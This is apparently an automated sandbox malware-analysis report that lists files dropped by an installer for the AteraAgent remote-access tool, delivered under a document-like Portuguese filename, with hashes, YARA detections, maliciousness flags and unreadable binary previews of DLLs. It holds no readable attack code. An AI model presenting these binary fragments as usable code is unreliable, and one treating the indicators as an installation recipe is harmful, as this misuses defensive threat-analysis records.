                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIA259.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25600
                                                                                                                                                                                                                                        Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                        MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                        SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                        SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                        SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIA259.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIA259.tmp-\CustomAction.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1538
                                                                                                                                                                                                                                        Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                        MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                        SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                        SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                        SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIA259.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):184240
                                                                                                                                                                                                                                        Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                        MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                        SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                        SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                        SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIA259.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):711952
                                                                                                                                                                                                                                        Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                        MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                        SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                        SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                        SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIA259.tmp-\System.Management.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61448
                                                                                                                                                                                                                                        Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                        MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                        SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                        SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                        SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIAC5.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIB4E8.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIB4E8.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25600
                                                                                                                                                                                                                                        Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                        MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                        SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                        SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                        SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIB4E8.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIB4E8.tmp-\CustomAction.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1538
                                                                                                                                                                                                                                        Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                        MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                        SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                        SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                        SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIB4E8.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):184240
                                                                                                                                                                                                                                        Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                        MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                        SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                        SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                        SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIB4E8.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):711952
                                                                                                                                                                                                                                        Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                        MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                        SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                        SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                        SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIB4E8.tmp-\System.Management.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61448
                                                                                                                                                                                                                                        Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                        MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                        SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                        SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                        SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIB586.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIBB81.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):437365
                                                                                                                                                                                                                                        Entropy (8bit):6.648219007267441
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:8t3jOZy2KsGU6a4Ksht3jOZy2KsGU6a4KsD:MzOE2Z34KGzOE2Z34K4
                                                                                                                                                                                                                                        MD5:CABE58A24CD2FC0A9BF411587DEAFAEF
                                                                                                                                                                                                                                        SHA1:782A8FA5E9D73ACAE70F652E182580E3B4877D05
                                                                                                                                                                                                                                        SHA-256:517332179E665D408C76F330EB61E698B4D3B079721D128C136889FE41C83E96
                                                                                                                                                                                                                                        SHA-512:FD779EDE138F235187CEF248B687D927BFCE5888A8C141D56A2DBA8AD6F7ABD9E0EEE964627670BCCA0EE70DC3DF5A3AA79B9B4E523DB29953929251A45E08AE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIBB81.tmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@<OBY.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent,.TRABALHO----PROCESSO0014S55-S440000000S1.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........StopAteraServiceQuiet....J...StopAteraServiceQuiet.@A......M..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<.........................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIBB92.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIBC4E.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
